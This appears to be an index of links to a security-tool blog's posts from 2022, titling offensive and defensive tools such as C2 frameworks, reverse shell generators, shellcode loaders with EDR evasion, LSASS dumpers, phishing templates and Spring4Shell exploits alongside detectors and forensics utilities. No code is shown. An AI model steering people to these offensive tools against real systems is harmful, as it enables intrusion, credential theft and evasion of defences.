- [Microsoft-365-Extractor-Suite - A Set Of PowerShell Scripts That Allow For Complete And Reliable Acquisition Of The Microsoft 365 Unified Audit Log](http://www.kitploit.com/2022/07/microsoft-365-extractor-suite-set-of.html)
- [Dlinject - Inject A Shared Library (I.E. Arbitrary Code) Into A Live Linux Process, Without Ptrace](http://www.kitploit.com/2022/07/dlinject-inject-shared-library-ie.html)
- [awsEnum - Enumerate AWS Cloud Resources Based On Provided Credential](http://www.kitploit.com/2022/07/awsenum-enumerate-aws-cloud-resources.html)
- [SharpWSUS - CSharp tool for lateral movement through WSUS](http://www.kitploit.com/2022/06/sharpwsus-csharp-tool-for-lateral.html)
- [Gallia - Extendable Pentesting Framework](http://www.kitploit.com/2022/06/gallia-extendable-pentesting-framework.html)
- [Jwtear - Modular Command-Line Tool To Parse, Create And Manipulate JWT Tokens For Hackers](http://www.kitploit.com/2022/06/jwtear-modular-command-line-tool-to.html)
- [Nimc2 - A C2 Fully Written In Nim](http://www.kitploit.com/2022/06/nimc2-c2-fully-written-in-nim.html)
- [secureCodeBox (SCB) - Continuous Secure Delivery Out Of The Box](http://www.kitploit.com/2022/06/securecodebox-scb-continuous-secure.html)
- [EmoCheck - Emotet Detection Tool For Windows OS](http://www.kitploit.com/2022/06/emocheck-emotet-detection-tool-for.html)
- [Sealighter - Easy ETW Tracing for Security Research](http://www.kitploit.com/2022/06/sealighter-easy-etw-tracing-for.html)
- [Scout - Lightweight URL Fuzzer And Spider: Discover A Web Server'S Undisclosed Files, Directories And VHOSTs](http://www.kitploit.com/2022/06/scout-lightweight-url-fuzzer-and-spider.html)
- [DFSCoerce - PoC For MS-DFSNM Coerce Authentication Using NetrDfsRemoveStdRoot Method](http://www.kitploit.com/2022/06/dfscoerce-poc-for-ms-dfsnm-coerce.html)
- [Nim-Loader - WIP Shellcode Loader In Nim With EDR Evasion Techniques](http://www.kitploit.com/2022/06/nim-loader-wip-shellcode-loader-in-nim.html)
- [Authcov - Web App Authorisation Coverage Scanning](http://www.kitploit.com/2022/06/authcov-web-app-authorisation-coverage.html)
- [Norimaci - Simple And Lightweight Malware Analysis Sandbox For macOS](http://www.kitploit.com/2022/06/norimaci-simple-and-lightweight-malware.html)
- [TrelloC2 - Simple C2 Over The Trello API](http://www.kitploit.com/2022/06/trelloc2-simple-c2-over-trello-api.html)
- [WEF - Wi-Fi Exploitation Framework](http://www.kitploit.com/2022/06/wef-wi-fi-exploitation-framework.html)
- [MalSCCM - Tool To Abuse Local Or Remote SCCM Servers To Deploy Malicious Applications](http://www.kitploit.com/2022/06/malsccm-tool-to-abuse-local-or-remote.html)
- [GooFuzz - Tool To Perform Fuzzing With An OSINT Approach, Managing To Enumerate Directories, Files, Subdomains Or Parameters Without Leaving Evidence On The Target's Server With Google Dorking](http://www.kitploit.com/2022/06/goofuzz-tool-to-perform-fuzzing-with.html)
- [Naabu - A Fast Port Scanner Written In Go With A Focus On Reliability And Simplicity](http://www.kitploit.com/2022/06/naabu-fast-port-scanner-written-in-go.html)
- [Msprobe - Finding All Things On-Prem Microsoft For Password Spraying And Enumeration](http://www.kitploit.com/2022/06/msprobe-finding-all-things-on-prem.html)
- [SharpSniper - Find Specific Users In Active Directory Via Their Username And Logon IP Address](http://www.kitploit.com/2022/06/sharpsniper-find-specific-users-in.html)
- [Xss_Vulnerability_Challenges - This Repository Is A Docker Containing Some "XSS Vulnerability" Challenges And Bypass Examples](http://www.kitploit.com/2022/06/xssvulnerabilitychallenges-this.html)
- [VAmPI - Vulnerable REST API With OWASP Top 10 Vulnerabilities For Security Testing](http://www.kitploit.com/2022/06/vampi-vulnerable-rest-api-with-owasp.html)
- [Cervantes - Collaborative Platform For Pentesters Or Red Teams Who Want To Save Time To Manage Their Projects, Clients, Vulnerabilities And Reports In One Place](http://www.kitploit.com/2022/06/cervantes-collaborative-platform-for.html)
- [Hunt-Sleeping-Beacons - Aims To Identify Sleeping Beacons](http://www.kitploit.com/2022/06/hunt-sleeping-beacons-aims-to-identify.html)
- [Nightingale - Docker Environment For Pentesting Which Having All The Required Tool For VAPT](http://www.kitploit.com/2022/06/nightingale-docker-environment-for.html)
- [OSIPs - Gathers All Valid IP Addresses From All Text Files From A Directory, And Checks Them Against Whois Database, TOR Relays And Location](http://www.kitploit.com/2022/06/osips-gathers-all-valid-ip-addresses.html)
- [LambdaGuard - AWS Serverless Security](http://www.kitploit.com/2022/06/lambdaguard-aws-serverless-security.html)
- [Frostbyte - FrostByte Is A POC Project That Combines Different Defense Evasion Techniques To Build Better Redteam Payloads](http://www.kitploit.com/2022/06/frostbyte-frostbyte-is-poc-project-that.html)
- [Admin-Panel_Finder - A Burp Suite Extension That Enumerates Infrastructure And Application Admin Interfaces (OTG-CONFIG-005)](http://www.kitploit.com/2022/06/admin-panelfinder-burp-suite-extension.html)
- [Gshell - A Flexible And Scalable Cross-Plaform Shell Generator Tool](http://www.kitploit.com/2022/06/gshell-flexible-and-scalable-cross.html)
- [Goreplay - Open-Source Tool For Capturing And Replaying Live HTTP Traffic Into A Test Environment In Order To Continuously Test Your System With Real Data](http://www.kitploit.com/2022/06/goreplay-open-source-tool-for-capturing.html)
- [SharpEventPersist - Persistence By Writing/Reading Shellcode From Event Log](http://www.kitploit.com/2022/06/sharpeventpersist-persistence-by.html)
- [confluencePot - Simple Honeypot For Atlassian Confluence (CVE-2022-26134)](http://www.kitploit.com/2022/06/confluencepot-simple-honeypot-for.html)
- [DOMDig - DOM XSS Scanner For Single Page Applications](http://www.kitploit.com/2022/06/domdig-dom-xss-scanner-for-single-page.html)
- [Exfilkit - Data Exfiltration Utility For Testing Detection Capabilities](http://www.kitploit.com/2022/06/exfilkit-data-exfiltration-utility-for.html)
- [Pulsar - Data Exfiltration And Covert Communication Tool](http://www.kitploit.com/2022/06/pulsar-data-exfiltration-and-covert.html)
- [WhiteBeam - Transparent Endpoint Security](http://www.kitploit.com/2022/06/whitebeam-transparent-endpoint-security.html)
- [Jeeves - Time-Based Blind SQLInjection Finder](http://www.kitploit.com/2022/06/jeeves-time-based-blind-sqlinjection.html)
- [PacketStreamer - Distributed Tcpdump For Cloud Native Environments](http://www.kitploit.com/2022/06/packetstreamer-distributed-tcpdump-for.html)
- [Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks](http://www.kitploit.com/2022/06/blackbird-osint-tool-to-search-for.html)
- [Offensive-Azure - Collection Of Offensive Tools Targeting Microsoft Azure](http://www.kitploit.com/2022/06/offensive-azure-collection-of-offensive.html)
- [AutoPWN Suite - Project For Scanning Vulnerabilities And Exploiting Systems Automatically](http://www.kitploit.com/2022/06/autopwn-suite-project-for-scanning.html)
- [Socialhunter - Crawls The Website And Finds Broken Social Media Links That Can Be Hijacked](http://www.kitploit.com/2022/06/socialhunter-crawls-website-and-finds.html)
- [Nipe - An Engine To Make Tor Network Your Default Gateway](http://www.kitploit.com/2022/06/nipe-engine-to-make-tor-network-your.html)
- [Sentinel-Attack - Tools To Rapidly Deploy A Threat Hunting Capability On Azure Sentinel That Leverages Sysmon And MITRE ATT&CK](http://www.kitploit.com/2022/06/sentinel-attack-tools-to-rapidly-deploy.html)
- [Lockc - Making Containers More Secure With eBPF And Linux Security Modules (LSM)](http://www.kitploit.com/2022/06/lockc-making-containers-more-secure.html)
- [AWS-Threat-Simulation-and-Detection - Playing Around With Stratus Red Team (Cloud Attack Simulation Tool) And SumoLogic](http://www.kitploit.com/2022/06/aws-threat-simulation-and-detection.html)
- [Puwr - SSH Pivoting Script For Expanding Attack Surfaces On Local Networks](http://www.kitploit.com/2022/06/puwr-ssh-pivoting-script-for-expanding.html)
- [AzureRT - A Powershell Module Implementing Various Azure Red Team Tactics](http://www.kitploit.com/2022/06/azurert-powershell-module-implementing.html)
- [COM-Hunter - COM Hijacking VOODOO](http://www.kitploit.com/2022/06/com-hunter-com-hijacking-voodoo.html)
- [CRLFsuite - Fast CRLF Injection Scanning Tool](http://www.kitploit.com/2022/06/crlfsuite-fast-crlf-injection-scanning.html)
- [SMB-Session-Spoofing - Tool To Create A Fake SMB Session](http://www.kitploit.com/2022/06/smb-session-spoofing-tool-to-create.html)
- [Atomic-Operator - A Python Package Is Used To Execute Atomic Red Team Tests (Atomics) Across Multiple Operating System Environments](http://www.kitploit.com/2022/06/atomic-operator-python-package-is-used.html)
- [Notionterm - Embed Reverse Shell In Notion Pages](http://www.kitploit.com/2022/06/notionterm-embed-reverse-shell-in.html)
- [MITM_Intercept - A Little Bit Less Hackish Way To Intercept And Modify non-HTTP Protocols Through Burp And Others](http://www.kitploit.com/2022/06/mitmintercept-little-bit-less-hackish.html)
- [Zap-Scripts - Zed Attack Proxy Scripts For Finding CVEs And Secrets](http://www.kitploit.com/2022/06/zap-scripts-zed-attack-proxy-scripts.html)
- [PowerGram - Multiplatform Telegram Bot In Pure PowerShell](http://www.kitploit.com/2022/06/powergram-multiplatform-telegram-bot-in.html)
- [Wrongsecrets - Examples With How To Not Use Secrets](http://www.kitploit.com/2022/05/wrongsecrets-examples-with-how-to-not.html)
- [K0Otkit - Universal Post-Penetration Technique Which Could Be Used In Penetrations Against Kubernetes Clusters](http://www.kitploit.com/2022/05/k0otkit-universal-post-penetration.html)
- [Labtainers - A Docker-based Cyber Lab Framework](http://www.kitploit.com/2022/05/labtainers-docker-based-cyber-lab.html)
- [PersistBOF - Tool To Help Automate Common Persistence Mechanisms](http://www.kitploit.com/2022/05/persistbof-tool-to-help-automate-common.html)
- [Mitmproxy2Swagger - Automagically Reverse-Engineer REST APIs Via Capturing Traffic](http://www.kitploit.com/2022/05/mitmproxy2swagger-automagically-reverse.html)
- [Hakoriginfinder - Tool For Discovering The Origin Host Behind A Reverse Proxy. Useful For Bypassing Cloud WAFs!](http://www.kitploit.com/2022/05/hakoriginfinder-tool-for-discovering.html)
- [BinAbsInspector - Vulnerability Scanner For Binaries](http://www.kitploit.com/2022/05/binabsinspector-vulnerability-scanner.html)
- [Stunner - Tool To Test And Exploit STUN, TURN And TURN Over TCP Servers](http://www.kitploit.com/2022/05/stunner-tool-to-test-and-exploit-stun.html)
- [LEAF - Linux Evidence Acquisition Framework](http://www.kitploit.com/2022/05/leaf-linux-evidence-acquisition.html)
- [Ransomware-Simulator - Ransomware Simulator Written In Golang](http://www.kitploit.com/2022/05/ransomware-simulator-ransomware.html)
- [Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework](http://www.kitploit.com/2022/05/pocsploit-lightweight-flexible-and.html)
- [FindFunc - Advanced Filtering/Finding of Functions in IDA Pro](http://www.kitploit.com/2022/05/findfunc-advanced-filteringfinding-of.html)
- [Frida-Ios-Hook - A Tool That Helps You Easy Trace Classes, Functions, And Modify The Return Values Of Methods On iOS Platform](http://www.kitploit.com/2022/05/frida-ios-hook-tool-that-helps-you-easy.html)
- [DroidDetective - A Machine Learning Malware Analysis Framework For Android Apps](http://www.kitploit.com/2022/05/droiddetective-machine-learning-malware.html)
- [Tornado - Anonymously Reverse Shell Over Tor Network Using Hidden Services Without Portforwarding](http://www.kitploit.com/2022/05/tornado-anonymously-reverse-shell-over.html)
- [Reposaur - The Open Source Compliance Tool For Development Platforms](http://www.kitploit.com/2022/05/reposaur-open-source-compliance-tool.html)
- [Frelatage - The Python Fuzzer That The World Deserves](http://www.kitploit.com/2022/05/frelatage-python-fuzzer-that-world.html)
- [Findwall - Check If Your Provider Is Blocking You!](http://www.kitploit.com/2022/05/findwall-check-if-your-provider-is.html)
- [RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry](http://www.kitploit.com/2022/05/redteam-physical-tools-red-team-toolkit.html)
- [Fb_Friend_List_Scraper - OSINT Tool To Scrape Names And Usernames From Large Friend Lists On Facebook, Without Being Rate Limited](http://www.kitploit.com/2022/05/fbfriendlistscraper-osint-tool-to.html)
- [Zphisher-GUI-Back_office - A Zphisher GUI Back-Office Plugin](http://www.kitploit.com/2022/05/zphisher-gui-backoffice-zphisher-gui.html)
- [Tetanus - Mythic C2 Agent Targeting Linux And Windows Hosts Written In Rust](http://www.kitploit.com/2022/05/tetanus-mythic-c2-agent-targeting-linux.html)
- [Xepor - Web Routing Framework For Reverse Engineers And Security Researchers, Brings The Best Of Mitmproxy And Flask](http://www.kitploit.com/2022/05/xepor-web-routing-framework-for-reverse.html)
- [Octopus - Open Source Pre-Operation C2 Server Based On Python And Powershell](http://www.kitploit.com/2022/05/octopus-open-source-pre-operation-c2.html)
- [C2concealer - Command Line Tool That Generates Randomized C2 Malleable Profiles For Use In Cobalt Strike](http://www.kitploit.com/2022/05/c2concealer-command-line-tool-that.html)
- [PowerProxy - PowerShell SOCKS Proxy With Reverse Proxy Capabilities](http://www.kitploit.com/2022/05/powerproxy-powershell-socks-proxy-with.html)
- [Cyph - Cryptographically Secure Messaging And Social Networking Service](http://www.kitploit.com/2022/05/cyph-cryptographically-secure-messaging.html)
- [ShadowClone - Unleash The Power Of Cloud](http://www.kitploit.com/2022/05/shadowclone-unleash-power-of-cloud.html)
- [Grafiki - Threat Hunting Tool About Sysmon And Graphs](http://www.kitploit.com/2022/05/grafiki-threat-hunting-tool-about.html)
- [Vaas - Verdict-as-a-Service SDKs: Analyze Files For Malicious Content](http://www.kitploit.com/2022/05/vaas-verdict-as-service-sdks-analyze.html)
- [Kali Linux 2022.2 - Penetration Testing and Ethical Hacking Linux Distribution](http://www.kitploit.com/2022/05/kali-linux-20222-penetration-testing.html)
- [BirDuster - A Multi Threaded Python Script Designed To Brute Force Directories And Files Names On Webservers](http://www.kitploit.com/2022/05/birduster-multi-threaded-python-script.html)
- [Chlonium - Chromium Cookie Import / Export Tool](http://www.kitploit.com/2022/05/chlonium-chromium-cookie-import-export.html)
- [NodeSecurityShield - A Developer And Security Engineer Friendly Package For Securing NodeJS Applications](http://www.kitploit.com/2022/05/nodesecurityshield-developer-and.html)
- [BWASP - BoB Web Application Security Project](http://www.kitploit.com/2022/05/bwasp-bob-web-application-security.html)
- [RogueAssemblyHunter - Rogue Assembly Hunter Is A Utility For Discovering 'Interesting' .NET CLR Modules In Running Processes](http://www.kitploit.com/2022/05/rogueassemblyhunter-rogue-assembly.html)
- [Process_Overwriting - Yet Another Variant Of Process Hollowing](http://www.kitploit.com/2022/05/processoverwriting-yet-another-variant.html)
- [Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types](http://www.kitploit.com/2022/05/heyserial-programmatically-create.html)
- [SSOh-No - User Enumeration And Password Spraying Tool For Testing Azure AD](http://www.kitploit.com/2022/05/ssoh-no-user-enumeration-and-password.html)
- [DuplicateDump - Dumping LSASS With A Duplicated Handle From Custom LSA Plugin](http://www.kitploit.com/2022/05/duplicatedump-dumping-lsass-with.html)
- [Kubeclarity - Tool For Detection And Management Of Software Bill Of Materials (SBOM) And Vulnerabilities Of Container Images And Filesystems](http://www.kitploit.com/2022/05/kubeclarity-tool-for-detection-and.html)
- [Spring4Shell-Poc - Spring Core RCE 0-day Vulnerability](http://www.kitploit.com/2022/05/spring4shell-poc-spring-core-rce-0-day.html)
- [Spring4Shell-POC - Dockerized Spring4Shell (CVE-2022-22965) PoC Application And Exploit](http://www.kitploit.com/2022/05/spring4shell-poc-dockerized.html)
- [AutoResponder - Carbon Black Response IR Tool](http://www.kitploit.com/2022/05/autoresponder-carbon-black-response-ir.html)
- [CVE-Tracker - With The Help Of This Automated Script, You Will Never Lose Track Of Recently Released CVEs](http://www.kitploit.com/2022/05/cve-tracker-with-help-of-this-automated.html)
- [Zi - A Swiss Army Knife for Zsh - Unix Shell](http://www.kitploit.com/2022/05/zi-swiss-army-knife-for-zsh-unix-shell.html)
- [GoSH - Golang Reverse/Bind Shell Generator](http://www.kitploit.com/2022/05/gosh-golang-reversebind-shell-generator.html)
- [Email-Prediction-Asterisks - Script That Allows You To Identify The Emails Hidden Behind Asterisks](http://www.kitploit.com/2022/05/email-prediction-asterisks-script-that.html)
- [PEzor-Docker - With The Help Of This Docker Image, You Can Easily Access PEzor On Your System!](http://www.kitploit.com/2022/05/pezor-docker-with-help-of-this-docker.html)
- [Malicious-Pdf - Generate A Bunch Of Malicious Pdf Files With Phone-Home Functionality](http://www.kitploit.com/2022/05/malicious-pdf-generate-bunch-of.html)
- [Graphql-Threat-Matrix - GraphQL Threat Framework Used By Security Professionals To Research Security Gaps In GraphQL Implementations](http://www.kitploit.com/2022/05/graphql-threat-matrix-graphql-threat.html)
- [Cliam - Multi Cloud IAM Permissions Enumeration Tool](http://www.kitploit.com/2022/05/cliam-multi-cloud-iam-permissions.html)
- [LDAPFragger - Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP](http://www.kitploit.com/2022/05/ldapfragger-command-and-control-tool.html)
- [LeakedHandlesFinder - Leaked Windows Processes Handles Identification Tool](http://www.kitploit.com/2022/05/leakedhandlesfinder-leaked-windows.html)
- [FirmWire -b Full-System Baseband Firmware Emulation Platform For Fuzzing, Debugging, And Root-Cause Analysis Of Smartphone Baseband Firmwares](http://www.kitploit.com/2022/05/firmwire-b-full-system-baseband.html)
- [Pybatfish - Python Client For Batfish (Network Configuration Analysis Tool)](http://www.kitploit.com/2022/05/pybatfish-python-client-for-batfish.html)
- [Moonwalk - Cover Your Tracks During Linux Exploitation By Leaving Zero Traces On System Logs And Filesystem Timestamps](http://www.kitploit.com/2022/05/moonwalk-cover-your-tracks-during-linux.html)
- [Nanodump - A Crappy LSASS Dumper With No ASCII Art](http://www.kitploit.com/2022/05/nanodump-crappy-lsass-dumper-with-no.html)
- [BackupOperatorToDA - From An Account Member Of The Group Backup Operators To Domain Admin Without RDP Or WinRM On The Domain Controller](http://www.kitploit.com/2022/05/backupoperatortoda-from-account-member.html)
- [Dora - Find Exposed API Keys Based On RegEx And Get Exploitation Methods For Some Of Keys That Are Found](http://www.kitploit.com/2022/04/dora-find-exposed-api-keys-based-on.html)
- [Requests-Ip-Rotator - A Python Library To Utilize AWS API Gateway's Large IP Pool As A Proxy To Generate Pseudo-Infinite IPs For Web Scraping And Brute Forcing](http://www.kitploit.com/2022/04/requests-ip-rotator-python-library-to.html)
- [Osinteye - Username Enumeration And Reconnaisance Suite](http://www.kitploit.com/2022/04/osinteye-username-enumeration-and.html)
- [Lupo - Malware IOC Extractor. Debugging Module For Malware Analysis Automation](http://www.kitploit.com/2022/04/lupo-malware-ioc-extractor-debugging.html)
- [IOSSecuritySuite - iOS Platform Security And Anti-Tampering Swift Library](http://www.kitploit.com/2022/04/iossecuritysuite-ios-platform-security.html)
- [Rip Raw - Small Tool To Analyse The Memory Of Compromised Linux Systems](http://www.kitploit.com/2022/04/rip-raw-small-tool-to-analyse-memory-of.html)
- [BITB - Browser In The Browser (BITB) Templates](http://www.kitploit.com/2022/04/bitb-browser-in-browser-bitb-templates.html)
- [O365-Doppelganger - A Quick Handy Script To Harvest Credentials Off Of A User During A Red Team And Get Execution Of A File From The User](http://www.kitploit.com/2022/04/o365-doppelganger-quick-handy-script-to.html)
- [VulFi - Plugin To IDA Pro Which Can Be Used To Assist During Bug Hunting In Binaries](http://www.kitploit.com/2022/04/vulfi-plugin-to-ida-pro-which-can-be.html)
- [Bore - Simple CLI Tool For Making Tunnels To Localhost](http://www.kitploit.com/2022/04/bore-simple-cli-tool-for-making-tunnels.html)
- [Wpgarlic - A Proof-Of-Concept WordPress Plugin Fuzzer](http://www.kitploit.com/2022/04/wpgarlic-proof-of-concept-wordpress.html)
- [DDexec - A Technique To Run Binaries Filelessly And Stealthily On Linux Using Dd To Replace The Shell With Another Process](http://www.kitploit.com/2022/04/ddexec-technique-to-run-binaries.html)
- [Spring4Shell-Scan - A Fully Automated, Reliable, And Accurate Scanner For Finding Spring4Shell And Spring Cloud RCE Vulnerabilities](http://www.kitploit.com/2022/04/spring4shell-scan-fully-automated.html)
- [Malwarescanner - Simple Malware Scanner Written In Python](http://www.kitploit.com/2022/04/malwarescanner-simple-malware-scanner.html)
- [Git-Dumper - A Tool To Dump A Git Repository From A Website](http://www.kitploit.com/2022/04/git-dumper-tool-to-dump-git-repository.html)
- [Spock SLAF - A Shared Library Application Firewall "SLAF"](http://www.kitploit.com/2022/04/spock-slaf-shared-library-application.html)
- [Sub3Suite - A Free, Open Source, Cross Platform Intelligence Gathering Tool](http://www.kitploit.com/2022/04/sub3suite-free-open-source-cross.html)
- [Ecapture - Capture SSL/TLS Text Content Without CA Cert By eBPF](http://www.kitploit.com/2022/04/ecapture-capture-ssltls-text-content.html)
- [Jfscan - A Super Fast And Customisable Port Scanner, Based On Masscan And NMap](http://www.kitploit.com/2022/04/jfscan-super-fast-and-customisable-port.html)
- [Ma2Tl - macOS Forensic Timeline Generator Using The Analysis Result DBs Of Mac_Apt](http://www.kitploit.com/2022/04/ma2tl-macos-forensic-timeline-generator.html)
- [DumpSMBShare - A Script To Dump Files And Folders Remotely From A Windows SMB Share](http://www.kitploit.com/2022/04/dumpsmbshare-script-to-dump-files-and.html)
- [Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io](http://www.kitploit.com/2022/04/smap-drop-in-replacement-for-nmap.html)
- [ADReaper - A Fast Enumeration Tool For Windows Active Directory Pentesting Written In Go](http://www.kitploit.com/2022/04/adreaper-fast-enumeration-tool-for.html)
- [KrbRelay - Framework For Kerberos Relaying](http://www.kitploit.com/2022/04/krbrelay-framework-for-kerberos-relaying.html)
- [Zircolite - A Standalone SIGMA-based Detection Tool For EVTX, Auditd And Sysmon For Linux Logs](http://www.kitploit.com/2022/04/zircolite-standalone-sigma-based.html)
- [linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks](http://www.kitploit.com/2022/04/linwinpwn-bash-script-that-automates.html)
- [OWASP Coraza WAF - A Golang Modsecurity Compatible Web Application Firewall Library](http://www.kitploit.com/2022/04/owasp-coraza-waf-golang-modsecurity.html)
- [Kraken - A Multi-Platform Distributed Brute-Force Password Cracking System](http://www.kitploit.com/2022/04/kraken-multi-platform-distributed-brute.html)
- [EDRSandblast - Tool That Weaponize A Vulnerable Signed Driver To Bypass EDR Detections And LSASS Protections](http://www.kitploit.com/2022/04/edrsandblast-tool-that-weaponize.html)
- [Shhhloader - SysWhispers Shellcode Loader](http://www.kitploit.com/2022/04/shhhloader-syswhispers-shellcode-loader.html)
- [modifyCertTemplate - ADCS Cert Template Modification And ACL Enumeration](http://www.kitploit.com/2022/04/modifycerttemplate-adcs-cert-template.html)
- [vAPI - Vulnerable Adversely Programmed Interface Which Is Self-Hostable API That Mimics OWASP API Top 10 Scenarios Through Exercises](http://www.kitploit.com/2022/04/vapi-vulnerable-adversely-programmed.html)
- [365Inspect - A PowerShell Script That Automates The Security Assessment Of Microsoft Office 365 Environments](http://www.kitploit.com/2022/04/365inspect-powershell-script-that.html)
- [Presshell - Quick And Dirty Wordpress Command Execution Shell](http://www.kitploit.com/2022/04/presshell-quick-and-dirty-wordpress.html)
- [Melody - A Transparent Internet Sensor Built For Threat Intelligence](http://www.kitploit.com/2022/04/melody-transparent-internet-sensor.html)
- [Maat - Open-source Symbolic Execution Framework](http://www.kitploit.com/2022/04/maat-open-source-symbolic-execution.html)
- [NimPackt-v1 - Nim-based Assembly Packer And Shellcode Loader For Opsec And Profit](http://www.kitploit.com/2022/04/nimpackt-v1-nim-based-assembly-packer.html)
- [EvilSelenium - A Tool That Weaponizes Selenium To Attack Chromium Based Browsers](http://www.kitploit.com/2022/04/evilselenium-tool-that-weaponizes.html)
- [Wholeaked - A File-Sharing Tool That Allows You To Find The Responsible Person In Case Of A Leakage](http://www.kitploit.com/2022/04/wholeaked-file-sharing-tool-that-allows.html)
- [LDAP shell - AD ACL Abuse](http://www.kitploit.com/2022/04/ldap-shell-ad-acl-abuse.html)
- [Poro - Scan Publicly Accessible Assets On Your AWS Cloud Environment](http://www.kitploit.com/2022/04/poro-scan-publicly-accessible-assets-on.html)
- [Skanuvaty - Dangerously Fast DNS/network/port Scanner](http://www.kitploit.com/2022/04/skanuvaty-dangerously-fast.html)
- [Uncover - Quickly Discover Exposed Hosts On The Internet Using Multiple Search Engine](http://www.kitploit.com/2022/04/uncover-quickly-discover-exposed-hosts.html)
- [Cloak - A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries](http://www.kitploit.com/2022/04/cloak-censorship-circumvention-tool-to.html)
- [OffensiveNotion - Notion As A Platform For Offensive Operations](http://www.kitploit.com/2022/04/offensivenotion-notion-as-platform-for.html)
- [Octosuite - Advanced Github OSINT Framework](http://www.kitploit.com/2022/04/octosuite-advanced-github-osint.html)
- [Gitbleed_Tools - For Extracting Data From Mirrorred Git Repositories](http://www.kitploit.com/2022/04/gitbleedtools-for-extracting-data-from.html)
- [Hcltm - Documenting Your Threat Models With HCL](http://www.kitploit.com/2022/04/hcltm-documenting-your-threat-models.html)
- [KNX-Bus-Dump - A Tool To Listen On A KNX Bus Via TPUART And The Calimero Project Suite And To Dump The Data From The Packets Into A Wireshark-Compatible File Hex Dump](http://www.kitploit.com/2022/04/knx-bus-dump-tool-to-listen-on-knx-bus.html)
- [ScheduleRunner - A C# Tool With More Flexibility To Customize Scheduled Task For Both Persistence And Lateral Movement In Red Team Operation](http://www.kitploit.com/2022/04/schedulerunner-c-tool-with-more.html)
- [DarthSidious - Building An Active Directory Domain And Hacking It](http://www.kitploit.com/2022/04/darthsidious-building-active-directory.html)
- [ICMP-TransferTools - Transfer Files To And From A Windows Host Via ICMP In Restricted Network Environments](http://www.kitploit.com/2022/04/icmp-transfertools-transfer-files-to.html)
- [Live-Forensicator - Powershell Script To Aid Incidence Response And Live Forensics](http://www.kitploit.com/2022/04/live-forensicator-powershell-script-to.html)
- [Phantun - Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer 3 &Amp; Layer 4 (NAPT) firewalls/NATs](http://www.kitploit.com/2022/04/phantun-transforms-udp-stream-into-fake.html)
- [CobaltBus - Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus](http://www.kitploit.com/2022/04/cobaltbus-cobalt-strike-external-c2.html)
- [Odin - Central IoC Scanner Based On Loki](http://www.kitploit.com/2022/04/odin-central-ioc-scanner-based-on-loki.html)
- [Subdomains.Sh - A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain. This Script Is Written With The Aim To Automate The Workflow](http://www.kitploit.com/2022/04/subdomainssh-wrapper-around-tools-i-use.html)
- [Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Token Impersonation](http://www.kitploit.com/2022/04/auto-elevate-escalate-from-low.html)
- [Slyther - AWS Security Tool](http://www.kitploit.com/2022/04/slyther-aws-security-tool.html)
- [Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP](http://www.kitploit.com/2022/03/spring-spel-0day-poc-spring-cloud.html)
- [CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability](http://www.kitploit.com/2022/03/cve-2022-22963-poc-spring-java.html)
- [CVE-2022-27254 - PoC For Vulnerability In Honda's Remote Keyless System](http://www.kitploit.com/2022/03/cve-2022-27254-poc-for-vulnerability-in.html)
- [Casper-Fs - A Custom Hidden Linux Kernel Module Generator. Each Module Works In The File System To Protect And Hide Secret Files](http://www.kitploit.com/2022/03/casper-fs-custom-hidden-linux-kernel.html)
- [LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly](http://www.kitploit.com/2022/03/lazypariah-tool-for-generating-reverse.html)
- [Socid-Extractor - Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose](http://www.kitploit.com/2022/03/socid-extractor-extract-accounts-info.html)
- [Fennec - Artifact Collection Tool For *Nix Systems](http://www.kitploit.com/2022/03/fennec-artifact-collection-tool-for-nix.html)
- [Gitcolombo - Extract And Analyze Contributors Info From Git Repos](http://www.kitploit.com/2022/03/gitcolombo-extract-and-analyze.html)
- [Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way](http://www.kitploit.com/2022/03/ostorlab-security-scanning-platform.html)
- [Nimcrypt2 - .NET, PE, And Raw Shellcode Packer/Loader Written In Nim](http://www.kitploit.com/2022/03/nimcrypt2-net-pe-and-raw-shellcode.html)
- [Request_Smuggler - Http Request Smuggling Vulnerability Scanner](http://www.kitploit.com/2022/03/requestsmuggler-http-request-smuggling.html)
- [Zkar - A Java Serialization Protocol Analysis Tool Implement In Go](http://www.kitploit.com/2022/03/zkar-java-serialization-protocol.html)
- [SysWhispers3 - AV/EDR Evasion Via Direct System Calls](http://www.kitploit.com/2022/03/syswhispers3-avedr-evasion-via-direct.html)
- [Factual-Rules-Generator - An Open Source Project Which Aims To Generate YARA Rules About Installed Software From A Machine](http://www.kitploit.com/2022/03/factual-rules-generator-open-source.html)
- [Tiktok-Scraper - TikTok Scraper. Download Video Posts, Collect User/Trend/Hashtag/Music Feed Metadata, Sign URL And Etc](http://www.kitploit.com/2022/03/tiktok-scraper-tiktok-scraper-download.html)
- [ADExplorerSnapshot.py - An AD Explorer Snapshot Parser. It Is Made As An Ingestor For BloodHound, And Also Supports Full-Object Dumping To NDJSON](http://www.kitploit.com/2022/03/adexplorersnapshotpy-ad-explorer.html)
- [ShellcodeTemplate - An Easily Modifiable Shellcode Template For Windows X64/X86](http://www.kitploit.com/2022/03/shellcodetemplate-easily-modifiable.html)
- [FastFinder - Incident Response - Fast Suspicious File Finder](http://www.kitploit.com/2022/03/fastfinder-incident-response-fast.html)
